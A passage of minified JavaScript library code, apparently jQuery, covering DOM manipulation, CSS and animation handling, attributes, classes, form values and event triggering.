d=a.handleObj,r(a.delegateTarget).off(d.namespace?d.origType+"."+d.namespace:d.origType,d.selector,d.handler),this;if("object"==typeof a){for(e in a)this.off(e,b,a[e]);return this}return b!==!1&&"function"!=typeof b||(c=b,b=void 0),c===!1&&(c=wa),this.each(function(){r.event.remove(this,a,c,b)})}});var za=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi,Aa=/<script|<style|<link/i,Ba=/checked\s*(?:[^=]|=\s*.checked.)/i,Ca=/^true\/(.*)/,Da=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g;function Ea(a,b){return B(a,"table")&&B(11!==b.nodeType?b:b.firstChild,"tr")?r(">tbody",a)[0]||a:a}function Fa(a){return a.type=(null!==a.getAttribute("type"))+"/"+a.type,a}function Ga(a){var b=Ca.exec(a.type);return b?a.type=b[1]:a.removeAttribute("type"),a}function Ha(a,b){var c,d,e,f,g,h,i,j;if(1===b.nodeType){if(W.hasData(a)&&(f=W.access(a),g=W.set(b,f),j=f.events)){delete g.handle,g.events={};for(e in j)for(c=0,d=j[e].length;c<d;c++)r.event.add(b,e,j[e][c])}X.hasData(a)&&(h=X.access(a),i=r.extend({},h),X.set(b,i))}}function Ia(a,b){var c=b.nodeName.toLowerCase();"input"===c&&ja.test(a.type)?b.checked=a.checked:"input"!==c&&"textarea"!==c||(b.defaultValue=a.defaultValue)}function Ja(a,b,c,d){b=g.apply([],b);var e,f,h,i,j,k,l=0,m=a.length,n=m-1,q=b[0],s=r.isFunction(q);if(s||m>1&&"string"==typeof q&&!o.checkClone&&Ba.test(q))return a.each(function(e){var f=a.eq(e);s&&(b[0]=q.call(this,e,f.html())),Ja(f,b,c,d)});if(m&&(e=qa(b,a[0].ownerDocument,!1,a,d),f=e.firstChild,1===e.childNodes.length&&(e=f),f||d)){for(h=r.map(na(e,"script"),Fa),i=h.length;l<m;l++)j=e,l!==n&&(j=r.clone(j,!0,!0),i&&r.merge(h,na(j,"script"))),c.call(a[l],j,l);if(i)for(k=h[h.length-1].ownerDocument,r.map(h,Ga),l=0;l<i;l++)j=h[l],la.test(j.type||"")&&!W.access(j,"globalEval")&&r.contains(k,j)&&(j.src?r._evalUrl&&r._evalUrl(j.src):p(j.textContent.replace(Da,""),k))}return a}function Ka(a,b,c){for(var d,e=b?r.filter(b,a):a,f=0;null!=(d=e[f]);f++)c||1!==d.nodeType||r.cleanData(na(d)),d.parentNode&&(c&&r.contains(d.ownerDocument,d)&&oa(na(d,"script")),d.parentNode.removeChild(d));return a}r.extend({htmlPrefilter:function(a){return a.replace(za,"<$1></$2>")},clone:function(a,b,c){var d,e,f,g,h=a.cloneNode(!0),i=r.contains(a.ownerDocument,a);if(!(o.noCloneChecked||1!==a.nodeType&&11!==a.nodeType||r.isXMLDoc(a)))for(g=na(h),f=na(a),d=0,e=f.length;d<e;d++)Ia(f[d],g[d]);if(b)if(c)for(f=f||na(a),g=g||na(h),d=0,e=f.length;d<e;d++)Ha(f[d],g[d]);else Ha(a,h);return g=na(h,"script"),g.length>0&&oa(g,!i&&na(a,"script")),h},cleanData:function(a){for(var b,c,d,e=r.event.special,f=0;void 0!==(c=a[f]);f++)if(U(c)){if(b=c[W.expando]){if(b.events)for(d in b.events)e[d]?r.event.remove(c,d):r.removeEvent(c,d,b.handle);c[W.expando]=void 0}c[X.expando]&&(c[X.expando]=void 0)}}}),r.fn.extend({detach:function(a){return Ka(this,a,!0)},remove:function(a){return Ka(this,a)},text:function(a){return T(this,function(a){return void 0===a?r.text(this):this.empty().each(function(){1!==this.nodeType&&11!==this.nodeType&&9!==this.nodeType||(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ja(this,arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=Ea(this,a);b.appendChild(a)}})},prepend:function(){return Ja(this,arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=Ea(this,a);b.insertBefore(a,b.firstChild)}})},before:function(){return Ja(this,arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this)})},after:function(){return Ja(this,arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this.nextSibling)})},empty:function(){for(var a,b=0;null!=(a=this[b]);b++)1===a.nodeType&&(r.cleanData(na(a,!1)),a.textContent="");return this},clone:function(a,b){return a=null!=a&&a,b=null==b?a:b,this.map(function(){return r.clone(this,a,b)})},html:function(a){return T(this,function(a){var b=this[0]||{},c=0,d=this.length;if(void 0===a&&1===b.nodeType)return b.innerHTML;if("string"==typeof a&&!Aa.test(a)&&!ma[(ka.exec(a)||["",""])[1].toLowerCase()]){a=r.htmlPrefilter(a);try{for(;c<d;c++)b=this[c]||{},1===b.nodeType&&(r.cleanData(na(b,!1)),b.innerHTML=a);b=0}catch(e){}}b&&this.empty().append(a)},null,a,arguments.length)},replaceWith:function(){var a=[];return Ja(this,arguments,function(b){var c=this.parentNode;r.inArray(this,a)<0&&(r.cleanData(na(this)),c&&c.replaceChild(b,this))},a)}}),r.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){r.fn[a]=function(a){for(var c,d=[],e=r(a),f=e.length-1,g=0;g<=f;g++)c=g===f?this:this.clone(!0),r(e[g])[b](c),h.apply(d,c.get());return this.pushStack(d)}});var La=/^margin/,Ma=new RegExp("^("+aa+")(?!px)[a-z%]+$","i"),Na=function(b){var c=b.ownerDocument.defaultView;return c&&c.opener||(c=a),c.getComputedStyle(b)};!function(){function b(){if(i){i.style.cssText="box-sizing:border-box;position:relative;display:block;margin:auto;border:1px;padding:1px;top:1%;width:50%",i.innerHTML="",ra.appendChild(h);var b=a.getComputedStyle(i);c="1%"!==b.top,g="2px"===b.marginLeft,e="4px"===b.width,i.style.marginRight="50%",f="4px"===b.marginRight,ra.removeChild(h),i=null}}var c,e,f,g,h=d.createElement("div"),i=d.createElement("div");i.style&&(i.style.backgroundClip="content-box",i.cloneNode(!0).style.backgroundClip="",o.clearCloneStyle="content-box"===i.style.backgroundClip,h.style.cssText="border:0;width:8px;height:0;top:0;left:-9999px;padding:0;margin-top:1px;position:absolute",h.appendChild(i),r.extend(o,{pixelPosition:function(){return b(),c},boxSizingReliable:function(){return b(),e},pixelMarginRight:function(){return b(),f},reliableMarginLeft:function(){return b(),g}}))}();function Oa(a,b,c){var d,e,f,g,h=a.style;return c=c||Na(a),c&&(g=c.getPropertyValue(b)||c[b],""!==g||r.contains(a.ownerDocument,a)||(g=r.style(a,b)),!o.pixelMarginRight()&&Ma.test(g)&&La.test(b)&&(d=h.width,e=h.minWidth,f=h.maxWidth,h.minWidth=h.maxWidth=h.width=g,g=c.width,h.width=d,h.minWidth=e,h.maxWidth=f)),void 0!==g?g+"":g}function Pa(a,b){return{get:function(){return a()?void delete this.get:(this.get=b).apply(this,arguments)}}}var Qa=/^(none|table(?!-c[ea]).+)/,Ra=/^--/,Sa={position:"absolute",visibility:"hidden",display:"block"},Ta={letterSpacing:"0",fontWeight:"400"},Ua=["Webkit","Moz","ms"],Va=d.createElement("div").style;function Wa(a){if(a in Va)return a;var b=a[0].toUpperCase()+a.slice(1),c=Ua.length;while(c--)if(a=Ua[c]+b,a in Va)return a}function Xa(a){var b=r.cssProps[a];return b||(b=r.cssProps[a]=Wa(a)||a),b}function Ya(a,b,c){var d=ba.exec(b);return d?Math.max(0,d[2]-(c||0))+(d[3]||"px"):b}function Za(a,b,c,d,e){var f,g=0;for(f=c===(d?"border":"content")?4:"width"===b?1:0;f<4;f+=2)"margin"===c&&(g+=r.css(a,c+ca[f],!0,e)),d?("content"===c&&(g-=r.css(a,"padding"+ca[f],!0,e)),"margin"!==c&&(g-=r.css(a,"border"+ca[f]+"Width",!0,e))):(g+=r.css(a,"padding"+ca[f],!0,e),"padding"!==c&&(g+=r.css(a,"border"+ca[f]+"Width",!0,e)));return g}function $a(a,b,c){var d,e=Na(a),f=Oa(a,b,e),g="border-box"===r.css(a,"boxSizing",!1,e);return Ma.test(f)?f:(d=g&&(o.boxSizingReliable()||f===a.style[b]),"auto"===f&&(f=a["offset"+b[0].toUpperCase()+b.slice(1)]),f=parseFloat(f)||0,f+Za(a,b,c||(g?"border":"content"),d,e)+"px")}r.extend({cssHooks:{opacity:{get:function(a,b){if(b){var c=Oa(a,"opacity");return""===c?"1":c}}}},cssNumber:{animationIterationCount:!0,columnCount:!0,fillOpacity:!0,flexGrow:!0,flexShrink:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":"cssFloat"},style:function(a,b,c,d){if(a&&3!==a.nodeType&&8!==a.nodeType&&a.style){var e,f,g,h=r.camelCase(b),i=Ra.test(b),j=a.style;return i||(b=Xa(h)),g=r.cssHooks[b]||r.cssHooks[h],void 0===c?g&&"get"in g&&void 0!==(e=g.get(a,!1,d))?e:j[b]:(f=typeof c,"string"===f&&(e=ba.exec(c))&&e[1]&&(c=fa(a,b,e),f="number"),null!=c&&c===c&&("number"===f&&(c+=e&&e[3]||(r.cssNumber[h]?"":"px")),o.clearCloneStyle||""!==c||0!==b.indexOf("background")||(j[b]="inherit"),g&&"set"in g&&void 0===(c=g.set(a,c,d))||(i?j.setProperty(b,c):j[b]=c)),void 0)}},css:function(a,b,c,d){var e,f,g,h=r.camelCase(b),i=Ra.test(b);return i||(b=Xa(h)),g=r.cssHooks[b]||r.cssHooks[h],g&&"get"in g&&(e=g.get(a,!0,c)),void 0===e&&(e=Oa(a,b,d)),"normal"===e&&b in Ta&&(e=Ta[b]),""===c||c?(f=parseFloat(e),c===!0||isFinite(f)?f||0:e):e}}),r.each(["height","width"],function(a,b){r.cssHooks[b]={get:function(a,c,d){if(c)return!Qa.test(r.css(a,"display"))||a.getClientRects().length&&a.getBoundingClientRect().width?$a(a,b,d):ea(a,Sa,function(){return $a(a,b,d)})},set:function(a,c,d){var e,f=d&&Na(a),g=d&&Za(a,b,d,"border-box"===r.css(a,"boxSizing",!1,f),f);return g&&(e=ba.exec(c))&&"px"!==(e[3]||"px")&&(a.style[b]=c,c=r.css(a,b)),Ya(a,c,g)}}}),r.cssHooks.marginLeft=Pa(o.reliableMarginLeft,function(a,b){if(b)return(parseFloat(Oa(a,"marginLeft"))||a.getBoundingClientRect().left-ea(a,{marginLeft:0},function(){return a.getBoundingClientRect().left}))+"px"}),r.each({margin:"",padding:"",border:"Width"},function(a,b){r.cssHooks[a+b]={expand:function(c){for(var d=0,e={},f="string"==typeof c?c.split(" "):[c];d<4;d++)e[a+ca[d]+b]=f[d]||f[d-2]||f[0];return e}},La.test(a)||(r.cssHooks[a+b].set=Ya)}),r.fn.extend({css:function(a,b){return T(this,function(a,b,c){var d,e,f={},g=0;if(Array.isArray(b)){for(d=Na(a),e=b.length;g<e;g++)f[b[g]]=r.css(a,b[g],!1,d);return f}return void 0!==c?r.style(a,b,c):r.css(a,b)},a,b,arguments.length>1)}});function _a(a,b,c,d,e){return new _a.prototype.init(a,b,c,d,e)}r.Tween=_a,_a.prototype={constructor:_a,init:function(a,b,c,d,e,f){this.elem=a,this.prop=c,this.easing=e||r.easing._default,this.options=b,this.start=this.now=this.cur(),this.end=d,this.unit=f||(r.cssNumber[c]?"":"px")},cur:function(){var a=_a.propHooks[this.prop];return a&&a.get?a.get(this):_a.propHooks._default.get(this)},run:function(a){var b,c=_a.propHooks[this.prop];return this.options.duration?this.pos=b=r.easing[this.easing](a,this.options.duration*a,0,1,this.options.duration):this.pos=b=a,this.now=(this.end-this.start)*b+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),c&&c.set?c.set(this):_a.propHooks._default.set(this),this}},_a.prototype.init.prototype=_a.prototype,_a.propHooks={_default:{get:function(a){var b;return 1!==a.elem.nodeType||null!=a.elem[a.prop]&&null==a.elem.style[a.prop]?a.elem[a.prop]:(b=r.css(a.elem,a.prop,""),b&&"auto"!==b?b:0)},set:function(a){r.fx.step[a.prop]?r.fx.step[a.prop](a):1!==a.elem.nodeType||null==a.elem.style[r.cssProps[a.prop]]&&!r.cssHooks[a.prop]?a.elem[a.prop]=a.now:r.style(a.elem,a.prop,a.now+a.unit)}}},_a.propHooks.scrollTop=_a.propHooks.scrollLeft={set:function(a){a.elem.nodeType&&a.elem.parentNode&&(a.elem[a.prop]=a.now)}},r.easing={linear:function(a){return a},swing:function(a){return.5-Math.cos(a*Math.PI)/2},_default:"swing"},r.fx=_a.prototype.init,r.fx.step={};var ab,bb,cb=/^(?:toggle|show|hide)$/,db=/queueHooks$/;function eb(){bb&&(d.hidden===!1&&a.requestAnimationFrame?a.requestAnimationFrame(eb):a.setTimeout(eb,r.fx.interval),r.fx.tick())}function fb(){return a.setTimeout(function(){ab=void 0}),ab=r.now()}function gb(a,b){var c,d=0,e={height:a};for(b=b?1:0;d<4;d+=2-b)c=ca[d],e["margin"+c]=e["padding"+c]=a;return b&&(e.opacity=e.width=a),e}function hb(a,b,c){for(var d,e=(kb.tweeners[b]||[]).concat(kb.tweeners["*"]),f=0,g=e.length;f<g;f++)if(d=e[f].call(c,b,a))return d}function ib(a,b,c){var d,e,f,g,h,i,j,k,l="width"in b||"height"in b,m=this,n={},o=a.style,p=a.nodeType&&da(a),q=W.get(a,"fxshow");c.queue||(g=r._queueHooks(a,"fx"),null==g.unqueued&&(g.unqueued=0,h=g.empty.fire,g.empty.fire=function(){g.unqueued||h()}),g.unqueued++,m.always(function(){m.always(function(){g.unqueued--,r.queue(a,"fx").length||g.empty.fire()})}));for(d in b)if(e=b[d],cb.test(e)){if(delete b[d],f=f||"toggle"===e,e===(p?"hide":"show")){if("show"!==e||!q||void 0===q[d])continue;p=!0}n[d]=q&&q[d]||r.style(a,d)}if(i=!r.isEmptyObject(b),i||!r.isEmptyObject(n)){l&&1===a.nodeType&&(c.overflow=[o.overflow,o.overflowX,o.overflowY],j=q&&q.display,null==j&&(j=W.get(a,"display")),k=r.css(a,"display"),"none"===k&&(j?k=j:(ia([a],!0),j=a.style.display||j,k=r.css(a,"display"),ia([a]))),("inline"===k||"inline-block"===k&&null!=j)&&"none"===r.css(a,"float")&&(i||(m.done(function(){o.display=j}),null==j&&(k=o.display,j="none"===k?"":k)),o.display="inline-block")),c.overflow&&(o.overflow="hidden",m.always(function(){o.overflow=c.overflow[0],o.overflowX=c.overflow[1],o.overflowY=c.overflow[2]})),i=!1;for(d in n)i||(q?"hidden"in q&&(p=q.hidden):q=W.access(a,"fxshow",{display:j}),f&&(q.hidden=!p),p&&ia([a],!0),m.done(function(){p||ia([a]),W.remove(a,"fxshow");for(d in n)r.style(a,d,n[d])})),i=hb(p?q[d]:0,d,m),d in q||(q[d]=i.start,p&&(i.end=i.start,i.start=0))}}function jb(a,b){var c,d,e,f,g;for(c in a)if(d=r.camelCase(c),e=b[d],f=a[c],Array.isArray(f)&&(e=f[1],f=a[c]=f[0]),c!==d&&(a[d]=f,delete a[c]),g=r.cssHooks[d],g&&"expand"in g){f=g.expand(f),delete a[d];for(c in f)c in a||(a[c]=f[c],b[c]=e)}else b[d]=e}function kb(a,b,c){var d,e,f=0,g=kb.prefilters.length,h=r.Deferred().always(function(){delete i.elem}),i=function(){if(e)return!1;for(var b=ab||fb(),c=Math.max(0,j.startTime+j.duration-b),d=c/j.duration||0,f=1-d,g=0,i=j.tweens.length;g<i;g++)j.tweens[g].run(f);return h.notifyWith(a,[j,f,c]),f<1&&i?c:(i||h.notifyWith(a,[j,1,0]),h.resolveWith(a,[j]),!1)},j=h.promise({elem:a,props:r.extend({},b),opts:r.extend(!0,{specialEasing:{},easing:r.easing._default},c),originalProperties:b,originalOptions:c,startTime:ab||fb(),duration:c.duration,tweens:[],createTween:function(b,c){var d=r.Tween(a,j.opts,b,c,j.opts.specialEasing[b]||j.opts.easing);return j.tweens.push(d),d},stop:function(b){var c=0,d=b?j.tweens.length:0;if(e)return this;for(e=!0;c<d;c++)j.tweens[c].run(1);return b?(h.notifyWith(a,[j,1,0]),h.resolveWith(a,[j,b])):h.rejectWith(a,[j,b]),this}}),k=j.props;for(jb(k,j.opts.specialEasing);f<g;f++)if(d=kb.prefilters[f].call(j,a,k,j.opts))return r.isFunction(d.stop)&&(r._queueHooks(j.elem,j.opts.queue).stop=r.proxy(d.stop,d)),d;return r.map(k,hb,j),r.isFunction(j.opts.start)&&j.opts.start.call(a,j),j.progress(j.opts.progress).done(j.opts.done,j.opts.complete).fail(j.opts.fail).always(j.opts.always),r.fx.timer(r.extend(i,{elem:a,anim:j,queue:j.opts.queue})),j}r.Animation=r.extend(kb,{tweeners:{"*":[function(a,b){var c=this.createTween(a,b);return fa(c.elem,a,ba.exec(b),c),c}]},tweener:function(a,b){r.isFunction(a)?(b=a,a=["*"]):a=a.match(L);for(var c,d=0,e=a.length;d<e;d++)c=a[d],kb.tweeners[c]=kb.tweeners[c]||[],kb.tweeners[c].unshift(b)},prefilters:[ib],prefilter:function(a,b){b?kb.prefilters.unshift(a):kb.prefilters.push(a)}}),r.speed=function(a,b,c){var d=a&&"object"==typeof a?r.extend({},a):{complete:c||!c&&b||r.isFunction(a)&&a,duration:a,easing:c&&b||b&&!r.isFunction(b)&&b};return r.fx.off?d.duration=0:"number"!=typeof d.duration&&(d.duration in r.fx.speeds?d.duration=r.fx.speeds[d.duration]:d.duration=r.fx.speeds._default),null!=d.queue&&d.queue!==!0||(d.queue="fx"),d.old=d.complete,d.complete=function(){r.isFunction(d.old)&&d.old.call(this),d.queue&&r.dequeue(this,d.queue)},d},r.fn.extend({fadeTo:function(a,b,c,d){return this.filter(da).css("opacity",0).show().end().animate({opacity:b},a,c,d)},animate:function(a,b,c,d){var e=r.isEmptyObject(a),f=r.speed(b,c,d),g=function(){var b=kb(this,r.extend({},a),f);(e||W.get(this,"finish"))&&b.stop(!0)};return g.finish=g,e||f.queue===!1?this.each(g):this.queue(f.queue,g)},stop:function(a,b,c){var d=function(a){var b=a.stop;delete a.stop,b(c)};return"string"!=typeof a&&(c=b,b=a,a=void 0),b&&a!==!1&&this.queue(a||"fx",[]),this.each(function(){var b=!0,e=null!=a&&a+"queueHooks",f=r.timers,g=W.get(this);if(e)g[e]&&g[e].stop&&d(g[e]);else for(e in g)g[e]&&g[e].stop&&db.test(e)&&d(g[e]);for(e=f.length;e--;)f[e].elem!==this||null!=a&&f[e].queue!==a||(f[e].anim.stop(c),b=!1,f.splice(e,1));!b&&c||r.dequeue(this,a)})},finish:function(a){return a!==!1&&(a=a||"fx"),this.each(function(){var b,c=W.get(this),d=c[a+"queue"],e=c[a+"queueHooks"],f=r.timers,g=d?d.length:0;for(c.finish=!0,r.queue(this,a,[]),e&&e.stop&&e.stop.call(this,!0),b=f.length;b--;)f[b].elem===this&&f[b].queue===a&&(f[b].anim.stop(!0),f.splice(b,1));for(b=0;b<g;b++)d[b]&&d[b].finish&&d[b].finish.call(this);delete c.finish})}}),r.each(["toggle","show","hide"],function(a,b){var c=r.fn[b];r.fn[b]=function(a,d,e){return null==a||"boolean"==typeof a?c.apply(this,arguments):this.animate(gb(b,!0),a,d,e)}}),r.each({slideDown:gb("show"),slideUp:gb("hide"),slideToggle:gb("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(a,b){r.fn[a]=function(a,c,d){return this.animate(b,a,c,d)}}),r.timers=[],r.fx.tick=function(){var a,b=0,c=r.timers;for(ab=r.now();b<c.length;b++)a=c[b],a()||c[b]!==a||c.splice(b--,1);c.length||r.fx.stop(),ab=void 0},r.fx.timer=function(a){r.timers.push(a),r.fx.start()},r.fx.interval=13,r.fx.start=function(){bb||(bb=!0,eb())},r.fx.stop=function(){bb=null},r.fx.speeds={slow:600,fast:200,_default:400},r.fn.delay=function(b,c){return b=r.fx?r.fx.speeds[b]||b:b,c=c||"fx",this.queue(c,function(c,d){var e=a.setTimeout(c,b);d.stop=function(){a.clearTimeout(e)}})},function(){var a=d.createElement("input"),b=d.createElement("select"),c=b.appendChild(d.createElement("option"));a.type="checkbox",o.checkOn=""!==a.value,o.optSelected=c.selected,a=d.createElement("input"),a.value="t",a.type="radio",o.radioValue="t"===a.value}();var lb,mb=r.expr.attrHandle;r.fn.extend({attr:function(a,b){return T(this,r.attr,a,b,arguments.length>1)},removeAttr:function(a){return this.each(function(){r.removeAttr(this,a)})}}),r.extend({attr:function(a,b,c){var d,e,f=a.nodeType;if(3!==f&&8!==f&&2!==f)return"undefined"==typeof a.getAttribute?r.prop(a,b,c):(1===f&&r.isXMLDoc(a)||(e=r.attrHooks[b.toLowerCase()]||(r.expr.match.bool.test(b)?lb:void 0)),void 0!==c?null===c?void r.removeAttr(a,b):e&&"set"in e&&void 0!==(d=e.set(a,c,b))?d:(a.setAttribute(b,c+""),c):e&&"get"in e&&null!==(d=e.get(a,b))?d:(d=r.find.attr(a,b),
null==d?void 0:d))},attrHooks:{type:{set:function(a,b){if(!o.radioValue&&"radio"===b&&B(a,"input")){var c=a.value;return a.setAttribute("type",b),c&&(a.value=c),b}}}},removeAttr:function(a,b){var c,d=0,e=b&&b.match(L);if(e&&1===a.nodeType)while(c=e[d++])a.removeAttribute(c)}}),lb={set:function(a,b,c){return b===!1?r.removeAttr(a,c):a.setAttribute(c,c),c}},r.each(r.expr.match.bool.source.match(/\w+/g),function(a,b){var c=mb[b]||r.find.attr;mb[b]=function(a,b,d){var e,f,g=b.toLowerCase();return d||(f=mb[g],mb[g]=e,e=null!=c(a,b,d)?g:null,mb[g]=f),e}});var nb=/^(?:input|select|textarea|button)$/i,ob=/^(?:a|area)$/i;r.fn.extend({prop:function(a,b){return T(this,r.prop,a,b,arguments.length>1)},removeProp:function(a){return this.each(function(){delete this[r.propFix[a]||a]})}}),r.extend({prop:function(a,b,c){var d,e,f=a.nodeType;if(3!==f&&8!==f&&2!==f)return 1===f&&r.isXMLDoc(a)||(b=r.propFix[b]||b,e=r.propHooks[b]),void 0!==c?e&&"set"in e&&void 0!==(d=e.set(a,c,b))?d:a[b]=c:e&&"get"in e&&null!==(d=e.get(a,b))?d:a[b]},propHooks:{tabIndex:{get:function(a){var b=r.find.attr(a,"tabindex");return b?parseInt(b,10):nb.test(a.nodeName)||ob.test(a.nodeName)&&a.href?0:-1}}},propFix:{"for":"htmlFor","class":"className"}}),o.optSelected||(r.propHooks.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){r.propFix[this.toLowerCase()]=this});function pb(a){var b=a.match(L)||[];return b.join(" ")}function qb(a){return a.getAttribute&&a.getAttribute("class")||""}r.fn.extend({addClass:function(a){var b,c,d,e,f,g,h,i=0;if(r.isFunction(a))return this.each(function(b){r(this).addClass(a.call(this,b,qb(this)))});if("string"==typeof a&&a){b=a.match(L)||[];while(c=this[i++])if(e=qb(c),d=1===c.nodeType&&" "+pb(e)+" "){g=0;while(f=b[g++])d.indexOf(" "+f+" ")<0&&(d+=f+" ");h=pb(d),e!==h&&c.setAttribute("class",h)}}return this},removeClass:function(a){var b,c,d,e,f,g,h,i=0;if(r.isFunction(a))return this.each(function(b){r(this).removeClass(a.call(this,b,qb(this)))});if(!arguments.length)return this.attr("class","");if("string"==typeof a&&a){b=a.match(L)||[];while(c=this[i++])if(e=qb(c),d=1===c.nodeType&&" "+pb(e)+" "){g=0;while(f=b[g++])while(d.indexOf(" "+f+" ")>-1)d=d.replace(" "+f+" "," ");h=pb(d),e!==h&&c.setAttribute("class",h)}}return this},toggleClass:function(a,b){var c=typeof a;return"boolean"==typeof b&&"string"===c?b?this.addClass(a):this.removeClass(a):r.isFunction(a)?this.each(function(c){r(this).toggleClass(a.call(this,c,qb(this),b),b)}):this.each(function(){var b,d,e,f;if("string"===c){d=0,e=r(this),f=a.match(L)||[];while(b=f[d++])e.hasClass(b)?e.removeClass(b):e.addClass(b)}else void 0!==a&&"boolean"!==c||(b=qb(this),b&&W.set(this,"__className__",b),this.setAttribute&&this.setAttribute("class",b||a===!1?"":W.get(this,"__className__")||""))})},hasClass:function(a){var b,c,d=0;b=" "+a+" ";while(c=this[d++])if(1===c.nodeType&&(" "+pb(qb(c))+" ").indexOf(b)>-1)return!0;return!1}});var rb=/\r/g;r.fn.extend({val:function(a){var b,c,d,e=this[0];{if(arguments.length)return d=r.isFunction(a),this.each(function(c){var e;1===this.nodeType&&(e=d?a.call(this,c,r(this).val()):a,null==e?e="":"number"==typeof e?e+="":Array.isArray(e)&&(e=r.map(e,function(a){return null==a?"":a+""})),b=r.valHooks[this.type]||r.valHooks[this.nodeName.toLowerCase()],b&&"set"in b&&void 0!==b.set(this,e,"value")||(this.value=e))});if(e)return b=r.valHooks[e.type]||r.valHooks[e.nodeName.toLowerCase()],b&&"get"in b&&void 0!==(c=b.get(e,"value"))?c:(c=e.value,"string"==typeof c?c.replace(rb,""):null==c?"":c)}}}),r.extend({valHooks:{option:{get:function(a){var b=r.find.attr(a,"value");return null!=b?b:pb(r.text(a))}},select:{get:function(a){var b,c,d,e=a.options,f=a.selectedIndex,g="select-one"===a.type,h=g?null:[],i=g?f+1:e.length;for(d=f<0?i:g?f:0;d<i;d++)if(c=e[d],(c.selected||d===f)&&!c.disabled&&(!c.parentNode.disabled||!B(c.parentNode,"optgroup"))){if(b=r(c).val(),g)return b;h.push(b)}return h},set:function(a,b){var c,d,e=a.options,f=r.makeArray(b),g=e.length;while(g--)d=e[g],(d.selected=r.inArray(r.valHooks.option.get(d),f)>-1)&&(c=!0);return c||(a.selectedIndex=-1),f}}}}),r.each(["radio","checkbox"],function(){r.valHooks[this]={set:function(a,b){if(Array.isArray(b))return a.checked=r.inArray(r(a).val(),b)>-1}},o.checkOn||(r.valHooks[this].get=function(a){return null===a.getAttribute("value")?"on":a.value})});var sb=/^(?:focusinfocus|focusoutblur)$/;r.extend(r.event,{trigger:function(b,c,e,f){var g,h,i,j,k,m,n,o=[e||d],p=l.call(b,"type")?b.type:b,q=l.call(b,"namespace")?b.namespace.split("."):[];if(h=i=e=e||d,3!==e.nodeType&&8!==e.nodeType&&!sb.test(p+r.event.triggered)&&(p.indexOf(".")>-1&&(q=p.split("."),p=q.shift(),q.sort()),k=p.indexOf(":")<0&&"on"+p,b=b[r.expando]?b:new r.Event(p,"object"==typeof b&&b),b.isTrigger=f?2:3,b.namespace=q.join("."),b.rnamespace=b.namespace?new RegExp("(^|\\.)"+q.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,b.result=void 0,b.target||(b.target=e),c=null==c?[b]:r.makeArray(c,[b]),n=r.event.special[p]||{},f||!n.trigger||n.trigger.apply(e,c)!==!1)){if(!f&&!n.noBubble&&!r.isWindow(e)){for(j=n.delegateType||p,sb.test(j+p)||(h=h.parentNode);h;h=h.parentNode)o.push(h),i=h;i===(e.ownerDocument||d)&&o.push(i.defaultView||i.parentWindow||a)}g=0;while((h=o[g++])&&!b.isPropagationStopped())b.type=g>1?j:n.bindType||p,m=(W.get(h,"events")||{})[b.type]&&W.get(h,"handle"),m&&m.apply(h,c),m=k&&h[k],m&&m.apply&&U(h)&&(b.result=m.apply(h,c),b.result===!1&&b.preventDefault());return b.type=p,f||b.isDefaultPrevented()||n._default&&n._default.apply(o.pop(),c)!==!1||!U(e)||k&&r.isFunction(e[p])&&!r.isWindow(e)&&(i=e[k],i&&(e[k]=null),r.event.triggered=p,e[p](),r.event.triggered=void 0,i&&(e[k]=i)),b.result}},simulate:function(a,b,c){var d=r.extend(new r.Event,c,{type:a,isSimulated:!0});r.event.trigger(d,null,b)}}),r.fn.extend({trigger:function(a,b){return this.each(function(){r.event.trigger(a,b,this)})},triggerHandler:function(a,b){var c=this[0];if(c)return r.event.trigger(a,b,c,!0)}}),r.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "),function(a,b){r.fn[b]=function(a,c){return arguments.length>0?this.on(b,null,a,c):this.trigger(b)}}),r.fn.extend({hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)}}),o.focusin="onfocusin"in a,o.focusin||r.each({focus:"focusin",blur:"focusout"},function(a,b){var c=function(a){r.event.simulate(b,a.target,r.event.fix(a))};r.event.special[b]={setup:function(){var d=this.ownerDocument||this,e=W.access(d,b);e||d.addEventListener(a,c,!0),W.access(d,b,(e||0)+1)},teardown:function(){var d=this.ownerDocument||this,e=W.access(d,b)-1;e?W.access(d,b,e):(d.removeEventListener(a,c,!0),W.remove(d,b))}}});var tb=a.location,ub=r.now(),vb=/\?/;r.parseXML=function(b){var c;if(!b||"string"!=typeof b)return null;try{c=(new a.DOMParser).parseFromString(b,"text/xml")}catch(d){c=void 0}return c&&!c.getElementsByTagName("parsererror").length||r.error("Invalid XML: "+b),c};var wb=/\[\]$/,xb=/\r?\n/g,yb=/^(?:submit|button|image|reset|file)$/i,zb=/^(?:input|select|textarea|keygen)/i;function Ab(a,b,c,d){var e;if(Array.isArray(b))r.each(b,function(b,e){c||wb.test(a)?d(a,e):Ab(a+"["+("object"==typeof e&&null!=e?b:"")+"]",e,c,d)});else if(c||"object"!==r.type(b))d(a,b);else for(e in b)Ab(a+"["+e+"]",b[e],c,d)}r.param=function(a,b){var c,d=[],e=function(a,b){var c=r.isFunction(b)?b():b;d[d.length]=encodeURIComponent(a)+"="+encodeURIComponent(null==c?"":c)};if(Array.isArray(a)||a.jquery&&!r.isPlainObject(a))r.each(a,function(){e(this.name,this.value)});else for(c in 